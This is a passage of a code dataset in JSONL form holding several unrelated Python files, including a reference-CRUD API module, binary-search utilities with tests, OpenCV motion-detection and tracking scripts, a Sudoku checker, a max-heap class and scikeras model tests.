reference_data = jsonable_encoder(reference_update)\n logger.debug(\"reference_data = {}\".format(reference_data))\n reference_id = int(curie_or_reference_id) if curie_or_reference_id.isdigit() else None\n reference_db_obj = db.query(ReferenceModel).filter(or_(\n ReferenceModel.curie == curie_or_reference_id,\n ReferenceModel.reference_id == reference_id)).one_or_none()\n\n if not reference_db_obj:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with curie or reference_id {curie_or_reference_id} not found\")\n\n for field, value in reference_data.items():\n if field == \"resource\" and value:\n resource_curie = value\n resource = db.query(ResourceModel).filter(ResourceModel.curie == resource_curie).first()\n if not resource:\n raise HTTPException(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Resource with curie {resource_curie} does not exist\")\n reference_db_obj.resource = resource\n else:\n setattr(reference_db_obj, field, value)\n\n # currently do not update citation on patches. code will call update_citation separately when all done\n # reference_db_obj.citation = get_citation_from_obj(db, reference_db_obj)\n reference_db_obj.dateUpdated = datetime.utcnow()\n db.commit()\n\n return {\"message\": \"updated\"}\n\n\ndef show_all_references_external_ids(db: Session):\n \"\"\"\n\n :param db:\n :return:\n \"\"\"\n\n references_query = db.query(ReferenceModel.curie,\n cast(func.array_agg(CrossReferenceModel.curie),\n ARRAY(String)),\n cast(func.array_agg(CrossReferenceModel.is_obsolete),\n ARRAY(Boolean))) \\\n .outerjoin(ReferenceModel.cross_reference) \\\n .group_by(ReferenceModel.curie)\n\n return [{\"curie\": reference[0],\n \"cross_references\": [{\"curie\": reference[1][idx],\n \"is_obsolete\": reference[2][idx]}\n for idx in range(len(reference[1]))]}\n for reference in references_query.all()]\n\n\ndef show(db: Session, curie_or_reference_id: str): # noqa\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :return:\n \"\"\"\n reference = get_reference(db, curie_or_reference_id, load_authors=True, load_mod_corpus_associations=True,\n load_mesh_terms=True, load_obsolete_references=True)\n reference_data = jsonable_encoder(reference)\n if reference.resource_id:\n reference_data[\"resource_curie\"] = \\\n db.query(ResourceModel.curie).filter(ResourceModel.resource_id == reference.resource_id).first()[0]\n reference_data[\"resource_title\"] = \\\n db.query(ResourceModel.title).filter(ResourceModel.resource_id == reference.resource_id).first()[0]\n\n if reference.copyright_license_id:\n crl = db.query(CopyrightLicenseModel).filter_by(\n copyright_license_id=reference.copyright_license_id).one_or_none()\n if crl:\n reference_data[\"copyright_license_name\"] = crl.name\n reference_data[\"copyright_license_url\"] = crl.url\n reference_data[\"copyright_license_description\"] = crl.description\n reference_data[\"copyright_license_open_access\"] = crl.open_access\n\n if reference.citation_id:\n cit = db.query(CitationModel).filter_by(\n citation_id=reference.citation_id).one_or_none()\n if cit:\n reference_data[\"citation\"] = cit.citation\n reference_data[\"citation_short\"] = cit.short_citation\n else:\n logger.warning(f\"ref: {reference} has no citation, id is {reference.citation_id}\")\n reference_data[\"citation\"] = f'Citation lookup failed for ref:{reference.curie} cit_id:{reference.citation_id}'\n reference_data[\"citation_short\"] = 'Citation lookup failed; no short citation available'\n else:\n reference_data[\"citation\"] = f'No citation_id for ref:{reference.curie}'\n reference_data[\"citation_short\"] = f'No citation_id for ref:{reference.curie}'\n\n bad_cross_ref_ids = []\n if reference.cross_reference:\n cross_references = []\n for cross_reference in reference.cross_reference:\n cross_reference_show = jsonable_encoder(cross_reference_crud.show(db, cross_reference.curie))\n del cross_reference_show[\"reference_curie\"]\n cross_references.append(cross_reference_show)\n reference_data[\"cross_references\"] = cross_references\n for x in cross_references:\n pieces = x['curie'].split(\":\")\n if len(pieces) > 2 and pieces[0] != 'DOI':\n ## will pick up something like 'FB:FB:FBrf0221304'\n bad_cross_ref_ids.append(x['curie'])\n elif pieces[1] == \"\":\n ## will pick up something like 'FB:'\n bad_cross_ref_ids.append(x['curie'])\n reference_data[\"invalid_cross_reference_ids\"] = bad_cross_ref_ids\n\n if reference.mod_referencetypes:\n reference_data[\"mod_reference_types\"] = []\n for ref_mod_referencetype in reference.mod_referencetypes:\n reference_data[\"mod_reference_types\"].append(\n jsonable_encoder(ModReferenceTypeSchemaRelated(\n mod_reference_type_id=ref_mod_referencetype.reference_mod_referencetype_id,\n reference_type=ref_mod_referencetype.mod_referencetype.referencetype.label,\n source=ref_mod_referencetype.mod_referencetype.mod.abbreviation)))\n reference_data[\"obsolete_references\"] = [obs_reference[\"curie\"] for obs_reference in\n reference_data[\"obsolete_reference\"]]\n del reference_data[\"obsolete_reference\"]\n\n # Note: this is slightly odd - we check reference.mod_corpus_association BUT\n # use reference_data[\"mod_corpus_association\"]\n if reference.mod_corpus_association:\n for i in range(len(reference_data[\"mod_corpus_association\"])):\n del reference_data[\"mod_corpus_association\"][i][\"reference_id\"]\n reference_data[\"mod_corpus_association\"][i][\"mod_abbreviation\"] = reference_data[\n \"mod_corpus_association\"][i][\"mod\"][\"abbreviation\"]\n del reference_data[\"mod_corpus_association\"][i][\"mod\"]\n del reference_data[\"mod_corpus_association\"][i][\"mod_id\"]\n reference_data[\"mod_corpus_associations\"] = reference_data[\"mod_corpus_association\"]\n del reference_data[\"mod_corpus_association\"]\n\n reference_data['workflow_tags'] = []\n if reference.workflow_tag:\n for ont in reference.workflow_tag:\n ont_json = show_workflow_tag(db, ont.reference_workflow_tag_id)\n\n reference_data[\"workflow_tags\"].append(ont_json)\n\n if reference.mesh_term:\n for mesh_term in reference_data[\"mesh_term\"]:\n del mesh_term[\"reference_id\"]\n reference_data['mesh_terms'] = reference_data['mesh_term']\n\n if reference.author:\n authors = []\n for author in reference_data[\"author\"]:\n del author[\"reference_id\"]\n authors.append(author)\n reference_data['authors'] = authors\n del reference_data['author']\n\n comment_and_corrections_data = {\"to_references\": [], \"from_references\": []} # type: Dict[str, List[str]]\n for comment_and_correction in reference.comment_and_corrections_out:\n comment_and_correction_data = reference_comment_and_correction_crud.show(db,\n comment_and_correction.reference_comment_and_correction_id)\n del comment_and_correction_data[\"reference_curie_from\"]\n comment_and_corrections_data[\"to_references\"].append(comment_and_correction_data)\n for comment_and_correction in reference.comment_and_corrections_in:\n comment_and_correction_data = reference_comment_and_correction_crud.show(db,\n comment_and_correction.reference_comment_and_correction_id)\n del 
comment_and_correction_data[\"reference_curie_to\"]\n comment_and_corrections_data[\"from_references\"].append(comment_and_correction_data)\n\n reference_data[\"comment_and_corrections\"] = comment_and_corrections_data\n logger.debug(\"returning {}\".format(reference_data))\n return reference_data\n\n\ndef show_changesets(db: Session, curie_or_reference_id: str):\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :return:\n \"\"\"\n reference_id = int(curie_or_reference_id) if curie_or_reference_id.isdigit() else None\n reference = db.query(ReferenceModel).filter(or_(\n ReferenceModel.curie == curie_or_reference_id, ReferenceModel.reference_id == reference_id)).one_or_none()\n if not reference:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with the reference id or curie {curie_or_reference_id} is not available\")\n history = []\n for version in reference.versions:\n tx = version.transaction\n history.append({\"transaction\": {\"id\": tx.id,\n \"issued_at\": tx.issued_at,\n \"user_id\": tx.user_id},\n \"changeset\": version.changeset})\n\n return history\n\n\ndef merge_references(db: Session,\n old_curie: str,\n new_curie: str):\n \"\"\"\n :param db:\n :param old_curie:\n :param new_curie:\n :return:\n\n Add merge details to obsolete_reference_curie table.\n Then delete old_curie.\n \"\"\"\n\n # Lookup both curies\n old_ref = db.query(ReferenceModel).filter(ReferenceModel.curie == old_curie).first()\n new_ref = db.query(ReferenceModel).filter(ReferenceModel.curie == new_curie).first()\n\n merge_comments_and_corrections(db, old_ref.reference_id, new_ref.reference_id,\n old_curie, new_curie)\n\n # Check if old_curie is already in the obsolete table (It may have been merged itself)\n # by looking for it in the new_id column.\n # If so then we also want to update that to the new_id.\n prev_obs_ref_cur = db.query(ObsoleteReferenceModel).filter(\n ObsoleteReferenceModel.new_id == old_ref.reference_id).all()\n for old in prev_obs_ref_cur:\n old.new_id = new_ref.reference_id\n obs_ref_cur_data = {'new_id': new_ref.reference_id,\n 'curie': old_ref.curie}\n # Add old_curie and new_id into the obsolete_reference_curie table.\n obs_ref_cur_db_obj = ObsoleteReferenceModel(**obs_ref_cur_data)\n db.add(obs_ref_cur_db_obj)\n # Commit remapping in obsolete_reference_curie to avoid deleting them when deleting old_ref\n db.commit()\n\n # Delete the old_curie object\n db.delete(old_ref)\n db.commit()\n return new_curie\n\n\ndef merge_comments_and_corrections(db, old_reference_id, new_reference_id, old_curie, new_curie):\n\n try:\n for x in db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_from=old_reference_id).all():\n y = db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_from=new_reference_id, reference_id_to=x.reference_id_to, reference_comment_and_correction_type=x.reference_comment_and_correction_type).one_or_none()\n if y is None:\n x.reference_id_from = new_reference_id\n db.add(x)\n else:\n db.delete(x)\n for x in db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_to=old_reference_id).all():\n y = db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_from=x.reference_id_from, reference_id_to=new_reference_id, reference_comment_and_correction_type=x.reference_comment_and_correction_type).one_or_none()\n if y is None:\n x.reference_id_to = new_reference_id\n db.add(x)\n else:\n db.delete(x)\n db.commit()\n except Exception as e:\n logger.warning(\"An error occurred when transferring the 
comments/corrections from \" + old_curie + \" to \" + new_curie + \" : \" + str(e))\n\n\ndef get_citation_from_args(authorNames, year, title, journal, volume, issue, page_range):\n\n if type(authorNames) == list:\n authorNames = \"; \".join(authorNames)\n\n if year is not None and not str(year).isdigit():\n year_re_result = re.search(r\"(\\d{4})\", year)\n if year_re_result:\n year = year_re_result.group(1)\n\n # Create the citation from the args given.\n citation = \"{}, ({}) {} {} {} ({}): {}\".\\\n format(authorNames, year, title,\n journal, volume, issue, page_range)\n return citation\n\n\ndef author_order_sort(author: AuthorModel):\n return author.order\n\n\ndef citation_from_data(reference_data, authorNames):\n if authorNames.endswith(\"; \"):\n authorNames = authorNames[:-2] # remove last '; '\n year = ''\n issue = ''\n volume = ''\n journal = ''\n page_range = ''\n title = ''\n if 'resource' in reference_data and reference_data[\"resource\"].title:\n journal = reference_data[\"resource\"].title\n if 'published_date' in reference_data:\n year = re.search(r\"(\\d{4})\", reference_data['date_published'])\n if not year:\n year = ''\n if 'issue' in reference_data and reference_data['issue']:\n issue = reference_data['issue']\n if 'page_range' in reference_data and reference_data['page_range']:\n page_range = reference_data['page_range']\n if 'title' in reference_data and reference_data['title']:\n title = reference_data['title']\n if not re.search('[.]$', title):\n title = title + '.'\n if 'volume' in reference_data and reference_data['volume']:\n volume = reference_data['volume']\n return get_citation_from_args(authorNames, year, title, journal, volume, issue, page_range)\n\n\ndef get_citation_from_obj(db: Session, ref_db_obj: ReferenceModel):\n\n # Authors, (year) title. 
Journal volume (issue): page_range\n year = ''\n if ref_db_obj.date_published:\n year_re_result = re.search(r\"(\\d{4})\", ref_db_obj.date_published)\n if year_re_result:\n year = year_re_result.group(1)\n\n title = ref_db_obj.title or ''\n if not re.search('[.]$', title):\n title = title + '.'\n\n authorNames = ''\n for author in db.query(AuthorModel).filter_by(reference_id=ref_db_obj.reference_id).order_by(AuthorModel.order).all():\n if author.name:\n authorNames += author.name + \"; \"\n authorNames = authorNames[:-2] # remove last ';'\n\n journal = ''\n if ref_db_obj.resource and ref_db_obj.resource.title:\n journal = ref_db_obj.resource.title\n\n citation = get_citation_from_args(authorNames, year, title, journal,\n ref_db_obj.volume or '',\n ref_db_obj.issue_name or '',\n ref_db_obj.page_range or '')\n return citation\n\n\ndef add_license(db: Session, curie: str, license: str): # noqa\n \"\"\"\n :param db:\n :param curie:\n :param license:\n :return:\n \"\"\"\n try:\n reference = db.query(ReferenceModel).filter_by(curie=curie).one()\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with the id '{curie}' is not in the database.\")\n\n license = license.replace('+', ' ')\n copyright_license_id = None\n if license != '':\n try:\n copyrightLicense = db.query(CopyrightLicenseModel).filter_by(name=license).one()\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Copyright_license with the name '{license}' is not in the database.\")\n copyright_license_id = copyrightLicense.copyright_license_id\n try:\n reference.copyright_license_id = copyright_license_id\n db.commit()\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Error adding license '{license}'\")\n return {\"message\": \"Update Success!\"}\n","sub_path":"agr_literature_service/api/crud/reference_crud.py","file_name":"reference_crud.py","file_ext":"py","file_size_in_byte":25633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"474098019","text":"import unittest\nimport time\n\n\ndef time_milli():\n return time.time() * 1000\n\n\ndef binary_insert(_list, item, comparator_fn):\n list_length = len(_list)\n left = 0\n right = len(_list) - 1\n mid = 0\n\n while left <= right:\n mid = round((left + right) / 2)\n comparison = comparator_fn(item, _list[mid])\n\n if comparison == 0:\n left = mid + 1\n right = mid - 1\n elif comparison == 1:\n right = mid - 1\n elif comparison == -1:\n left = mid + 1\n\n index_to_insert_at = mid\n\n if list_length > 0:\n comparison = comparator_fn(item, _list[index_to_insert_at])\n if comparison == -1:\n index_to_insert_at += 1\n\n if list_length == index_to_insert_at:\n _list.append(item)\n else:\n _list[index_to_insert_at:index_to_insert_at] = [item]\n\n return index_to_insert_at\n\n\ndef binary_search(sorted_list, item, comparator_fn):\n left = 0\n right = len(sorted_list) - 1\n\n while left <= right:\n mid = round((left + right) / 2)\n comparison = comparator_fn(item, sorted_list[mid])\n if comparison == 0:\n return mid\n elif comparison == 1:\n right = mid - 1\n elif comparison == -1:\n left = mid + 1\n return -1\n\n\ndef comparator(item, comparable):\n if item['price'] == comparable['price'] \\\n and item['exchange'] == comparable['exchange'] \\\n and item['type'] == comparable['type']:\n return 0\n\n if item['price'] < comparable['price']:\n return -1\n elif item['price'] > comparable['price']:\n return 1\n if 
item['type'] == 'ask' and comparable['type'] == 'bid':\n return 1\n if item['type'] == 'bid' and comparable['type'] == 'ask':\n return -1\n if item['exchange'] < comparable['exchange']:\n return -1\n if item['exchange'] > comparable['exchange']:\n return 1\n return False\n\n\nclass ArbitrageDetectorTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.item1 = {'price': 10, 'qty': 1, 'exchange': 'binance', 'type': 'bid'}\n cls.item2 = {'price': 11, 'qty': 2, 'exchange': 'binance', 'type': 'ask'}\n cls.item3 = {'price': 10, 'qty': 2, 'exchange': 'okcoin', 'type': 'ask'}\n cls.item4 = {'price': 9, 'qty': 3, 'exchange': 'bitfinex', 'type': 'bid'}\n cls.item5 = {'price': 11, 'qty': 3, 'exchange': 'kraken', 'type': 'bid'}\n\n cls.item6 = {'price': 11, 'qty': 3, 'exchange': 'bla', 'type': 'bid'}\n\n def test_comparator(self):\n self.assertEqual(comparator(self.item1, self.item2), -1)\n\n self.assertEqual(comparator(self.item1, self.item3), -1)\n\n self.assertEqual(comparator(self.item1, self.item4), 1)\n\n def test_insert(self):\n test_list = []\n binary_insert(test_list, self.item2, comparator)\n binary_insert(test_list, self.item1, comparator)\n binary_insert(test_list, self.item3, comparator)\n binary_insert(test_list, self.item4, comparator)\n binary_insert(test_list, self.item5, comparator)\n\n print(test_list)\n self.assertEqual(test_list[0]['price'], 11)\n self.assertEqual(test_list[0]['type'], 'ask')\n self.assertEqual(test_list[1]['price'], 11)\n self.assertEqual(test_list[1]['type'], 'bid')\n self.assertEqual(test_list[2]['price'], 10)\n self.assertEqual(test_list[2]['type'], 'ask')\n self.assertEqual(test_list[3]['price'], 10)\n self.assertEqual(test_list[3]['type'], 'bid')\n self.assertEqual(test_list[4]['price'], 9)\n self.assertEqual(test_list[4]['type'], 'bid')\n\n test_list = []\n binary_insert(test_list, self.item3, comparator)\n binary_insert(test_list, self.item2, comparator)\n binary_insert(test_list, self.item4, comparator)\n binary_insert(test_list, self.item1, comparator)\n binary_insert(test_list, self.item5, comparator)\n\n print(test_list)\n self.assertEqual(test_list[0]['price'], 11)\n self.assertEqual(test_list[1]['price'], 11)\n self.assertEqual(test_list[2]['price'], 10)\n self.assertEqual(test_list[3]['price'], 10)\n self.assertEqual(test_list[4]['price'], 9)\n\n def test_index_of(self):\n test_list = []\n binary_insert(test_list, self.item3, comparator)\n binary_insert(test_list, self.item2, comparator)\n binary_insert(test_list, self.item4, comparator)\n binary_insert(test_list, self.item1, comparator)\n binary_insert(test_list, self.item5, comparator)\n\n self.assertEqual(binary_search(test_list, self.item2, comparator), 0)\n self.assertEqual(binary_search(test_list, self.item5, comparator), 1)\n self.assertEqual(binary_search(test_list, self.item3, comparator), 2)\n self.assertEqual(binary_search(test_list, self.item1, comparator), 3)\n self.assertEqual(binary_search(test_list, self.item4, comparator), 4)\n self.assertEqual(binary_search(test_list, self.item6, comparator), -1)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"648228258","text":"import cv2\nfrom datetime import datetime\ndef diffImg(t0, t1, t2):\n d1 = cv2.absdiff(t2, t1)\n d2 = cv2.absdiff(t1, t0)\n return cv2.bitwise_and(d1, d2)\nthreshold = 101500\ncam = 
cv2.VideoCapture(0)\nwinName = \"Movement Indicator\"\ncv2.namedWindow(winName)\n# Read three images first:\nt_minus = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\nt = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\nt_plus = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\n# Let's use a time check so we only take 1 pic per sec\ntimeCheck = datetime.now().strftime('%Ss')\nwhile True:\n cv2.imshow( winName, cam.read()[1] )\n if cv2.countNonZero(diffImg(t_minus, t, t_plus)) > threshold and timeCheck != datetime.now().strftime('%Ss'):\n dimg= cam.read()[1]\n cv2.imwrite(datetime.now().strftime('%Y%m%d_%Hh%Mm%Ss%f') + '.jpg', dimg)\n print(\"Image written\")\n timeCheck = datetime.now().strftime('%Ss')\n # Read next image\n t_minus = t\n t = t_plus\n t_plus = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyWindow(winName)\n break\n","sub_path":"computacao-grafica-opencv-python/Computação Gráfica/deteccaoMovimento.py","file_name":"deteccaoMovimento.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"232991905","text":"import cv2\n\ncap = cv2.VideoCapture(0)\n\n# Capture several frames to allow the camera's autoexposure to adjust.\nfor i in range(10):\n success, frame = cap.read()\nif not success:\n exit(1)\n\n# Define an initial tracking window in the center of the frame.\nframe_h, frame_w = frame.shape[:2]\nw = frame_w//8\nh = frame_h//8\nx = frame_w//2 - w//2\ny = frame_h//2 - h//2\ntrack_window = (x, y, w, h)\n\n# Calculate the normalized HSV histogram of the initial window.\nroi = frame[y:y+h, x:x+w]\nhsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\nmask = None\nroi_hist = cv2.calcHist([hsv_roi], [0], mask, [180], [0, 180])\ncv2.normalize(roi_hist, roi_hist, 0, 255, cv2.NORM_MINMAX)\n\n# Define the termination criteria:\n# 10 iterations or convergence within 1-pixel radius.\nterm_crit = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 10, 1)\n\nsuccess, frame = cap.read()\nwhile success:\n\n # Perform back-projection of the HSV histogram onto the frame.\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n back_proj = cv2.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)\n\n # Perform tracking with MeanShift.\n num_iters, track_window = cv2.meanShift(\n back_proj, track_window, term_crit)\n\n # Draw the tracking window.\n x, y, w, h = track_window\n cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n cv2.imshow('back-projection', back_proj)\n cv2.imshow('meanshift', frame)\n\n k = cv2.waitKey(1)\n if k == 27: # Escape\n break\n\n success, frame = cap.read()\n","sub_path":"chapter08/meanshift.py","file_name":"meanshift.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"132997407","text":"\n\n## Solution approach\n# 1. Check that no value repeats within each mini-box\n# 2. Check that no value repeats within each row\n# 3. Check that no value repeats within each column\n
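#\n# (Note: every check below uses a counting list indexed by the cell value,\n# so any count that goes above 1 flags a duplicate.)\n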
\nimport sys\nsys.stdin = open('SWEA_1974.txt', 'r')\n\n\ndef mini_box(arr, nr, nc):\n dr = [1, -1, 0, 0, -1, -1, 1, 1] # up, down, left, right and the 4 diagonals\n dc = [0, 0, -1, 1, -1, 1, 1, -1]\n\n check = [0] * 10 # list used to verify each of 1~9 appears exactly once (counting-sort style)\n check[arr[nr][nc]] += 1 # count using the current cell value as an index\n\n for i in range(len(dr)):\n r = nr + dr[i]\n c = nc + dc[i]\n\n check[arr[r][c]] += 1\n if check[arr[r][c]] > 1:\n return False\n return True\n\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = 9\n arr = [list(map(int, input().split())) for _ in range(N)]\n\n row = True\n col = True\n box = True\n res = 0\n\n # check for duplicates in each row\n for i in range(N):\n check = [0] * (N+1) # 0 never appears, but values are used as indexes, so 10 slots (up to index 9) are needed\n for j in range(N):\n check[arr[i][j]] += 1\n if check[arr[i][j]] > 1:\n row = False\n\n # check for duplicates in each column\n for j in range(N):\n check = [0] * (N+1)\n for i in range(N):\n check[arr[i][j]] += 1\n if check[arr[i][j]] > 1:\n col = False\n\n # check for duplicates in each mini-box\n for nr in range(1, 10, 3):\n for nc in range(1, 10, 3):\n if mini_box(arr, nr, nc) == False:\n box = False\n\n # if nothing is duplicated anywhere, res = 1\n if row:\n if col:\n if box:\n res = 1\n\n print(f'#{tc} {res}')\n\n\n\n\n\n\n\n\n\n","sub_path":"유진/SWEA_1974(스도쿠 검증).py","file_name":"SWEA_1974(스도쿠 검증).py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"428697634","text":"import sqlite3\nfrom flask import current_app,g\nfrom app import app\n\n\ndef get_db():\n if 'db' not in g:\n g.db = sqlite3.connect(current_app.config['DATABASE'],detect_types=sqlite3.PARSE_DECLTYPES)\n g.db.row_factory =sqlite3.Row\n return g.db\n\n\ndef close_db(e = None):\n db = g.pop('db',None)\n if db is not None:\n db.close()\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef init_app(app):\n init_db()\n app.teardown_appcontext(close_db)","sub_path":"sqlitedb.py","file_name":"sqlitedb.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"299951331","text":"#!/usr/bin/env python\n#\nimport unittest\nfrom unittest.mock import Mock\n\nham = Mock() # <1>\n\n\n# system under test\nclass Spam():\n def __init__(self, param):\n self._value = ham(param) # <2>\n\n\n# dependency to be mocked -- not used in test\n# def ham(n):\n# pass\n\nclass TestSpam(unittest.TestCase): # <3>\n\n def test_spam_calls_ham(self):\n Spam(42) # <4>\n ham.assert_called_once_with(42) # <5>\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"mock_basics.py","file_name":"mock_basics.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"422456589","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 25 10:52:23 2020\r\n\r\n@author: HP\r\n\"\"\"\r\n\r\nclass MaxHeap:\r\n #HeapObject class that wraps the key and value.\r\n class HeapObject:\r\n def __init__(self,key,value):\r\n self.key=key\r\n self.value=value\r\n \r\n def __init__(self):\r\n self.__array=[]#initialising the heap array.\r\n \r\n #Performs the add operation.\r\n def add(self,key,value=None):\r\n heapObject=self.HeapObject(key,value)\r\n self.__array.append(heapObject)\r\n self.__addOperation()\r\n \r\n #Helper that restores the max-heap property after an append.\r\n def __addOperation(self):\r\n
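 # Bubble the newly appended item up while it is greater than its parent,\r\n # restoring the max-heap invariant.\r\n 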
currentPos=len(self.__array)-1\r\n while(currentPos!=0):\r\n parentPos=self.__getParentPos(currentPos)\r\n if(not self.__check(currentPos,parentPos)):\r\n break\r\n \r\n self.__array[currentPos],self.__array[parentPos]=self.__array[parentPos],self.__array[currentPos]\r\n currentPos=parentPos\r\n \r\n \r\n #This Method returns the parentPos of a childPosition. \r\n def __getParentPos(self,childPos):\r\n if(childPos%2==0):\r\n return childPos//2-1\r\n return childPos//2\r\n #Method that checks whether the child object is greater than its parent.\r\n def __check(self,childPos,parentPos):\r\n childObj=self.__array[childPos]\r\n parentObj=self.__array[parentPos]\r\n if(childObj.key>parentObj.key):\r\n return True\r\n return False\r\n #Method that returns the top item (its value, or its key if no value was stored) and removes it.\r\n def poll(self):\r\n \r\n if(len(self.__array)==0):\r\n raise Exception(\"RunTime Exception:PriorityQueue is Empty\")\r\n \r\n heapObjectTop=self.__array[0]\r\n self.__array[0]=self.__array[len(self.__array)-1]\r\n self.__array.pop()\r\n if(len(self)>0):\r\n self.__removeOperation()\r\n \r\n if(heapObjectTop.value==None):\r\n return heapObjectTop.key\r\n return heapObjectTop.value\r\n \r\n #Method that returns the top item without removing it.\r\n def peek(self):\r\n if(len(self.__array)==0):\r\n raise Exception(\"RunTime Exception:PriorityQueue is Empty\")\r\n heapObject=self.__array[0]\r\n if(heapObject.value==None):\r\n return heapObject.key\r\n return heapObject.value\r\n \r\n #Method that performs the remove operation of a heap.\r\n def __removeOperation(self):\r\n #print(\"Inside remove operation\")\r\n currentPos=0\r\n children=self.__getChildren(currentPos)\r\n while(len(children)>0):\r\n #print(\"Inside while loop\")\r\n maxPos=self.__getMax(children)\r\n if(not self.__check(maxPos,currentPos)):\r\n break\r\n self.__array[currentPos],self.__array[maxPos]=self.__array[maxPos],self.__array[currentPos]\r\n currentPos=maxPos\r\n children=self.__getChildren(currentPos)\r\n #Method that returns the children of a parentPos\r\n def __getChildren(self,parentPos):\r\n count=self.__numberOfChildren(parentPos)\r\n if(count==2):\r\n return [2*parentPos+1,2*parentPos+2]\r\n if(count==1):\r\n return [2*parentPos+1]\r\n return []\r\n #Method that returns the number of children.\r\n def __numberOfChildren(self,parentPos):\r\n left=2*parentPos+1\r\n right=2*parentPos+2\r\n count=0\r\n if(left<len(self.__array)):\r\n count+=1\r\n if(right<len(self.__array)):\r\n count+=1\r\n return count\r\n #Method that returns the number of items currently in the heap.\r\n def __len__(self):\r\n return len(self.__array)\r\n\n\nclass FunctionalAPIMultiInputClassifier(KerasClassifier):\n \"\"\"Tests Functional API Classifier with 2 inputs.\n \"\"\"\n\n def _keras_build_fn(\n self, meta: Dict[str, Any], compile_kwargs: Dict[str, Any],\n ) -> Model:\n # get params\n n_classes_ = meta[\"n_classes_\"]\n\n inp1 = Input((1,))\n inp2 = Input((3,))\n\n x1 = Dense(100)(inp1)\n x2 = Dense(100)(inp2)\n\n x3 = Concatenate(axis=-1)([x1, x2])\n\n cat_out = Dense(n_classes_, activation=\"softmax\")(x3)\n\n model = Model([inp1, inp2], [cat_out])\n losses = [\"sparse_categorical_crossentropy\"]\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"accuracy\"])\n\n return model\n\n @property\n def feature_encoder(self):\n return FunctionTransformer(func=lambda X: [X[:, 0], X[:, 1:4]],)\n\n\nclass FunctionalAPIMultiLabelClassifier(MultiOutputClassifier):\n \"\"\"Tests Functional API Classifier with multiple binary outputs.\n \"\"\"\n\n def _keras_build_fn(\n self, meta: Dict[str, Any], compile_kwargs: Dict[str, Any],\n ) -> Model:\n # get params\n n_outputs_ = meta[\"n_outputs_\"]\n\n inp = Input((4,))\n\n x1 = Dense(100)(inp)\n\n outputs = []\n for _ in range(n_outputs_):\n # simulate multiple binary classification outputs\n # in reality, these would come from different nodes\n outputs.append(Dense(1, activation=\"sigmoid\")(x1))\n\n model = Model(inp, outputs)\n
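 # Keras applies a single loss string to every output of a multi-output model.\n 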
= \"binary_crossentropy\"\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"accuracy\"])\n\n return model\n\n\nclass FunctionalAPIMultiOutputRegressor(KerasRegressor):\n \"\"\"Tests Functional API Regressor with multiple outputs.\n \"\"\"\n\n def _keras_build_fn(\n self, meta: Dict[str, Any], compile_kwargs: Dict[str, Any],\n ) -> Model:\n # get params\n n_outputs_ = meta[\"n_outputs_\"]\n\n inp = Input((INPUT_DIM,))\n\n x1 = Dense(100)(inp)\n\n outputs = [Dense(n_outputs_)(x1)]\n\n model = Model([inp], outputs)\n losses = \"mean_squared_error\"\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"mse\"])\n\n return model\n\n\ndef test_multi_input():\n \"\"\"Tests custom multi-input Keras model.\n \"\"\"\n clf = FunctionalAPIMultiInputClassifier()\n (x_train, y_train), (x_test, y_test) = get_test_data(\n train_samples=TRAIN_SAMPLES,\n test_samples=TEST_SAMPLES,\n input_shape=(4,),\n num_classes=3,\n )\n\n clf.fit(x_train, y_train)\n clf.predict(x_test)\n clf.score(x_train, y_train)\n\n\ndef test_multi_output():\n \"\"\"Compares to scikit-learn RandomForestClassifier classifier.\n \"\"\"\n\n def get_model(meta: Dict[str, Any]) -> Model:\n # get 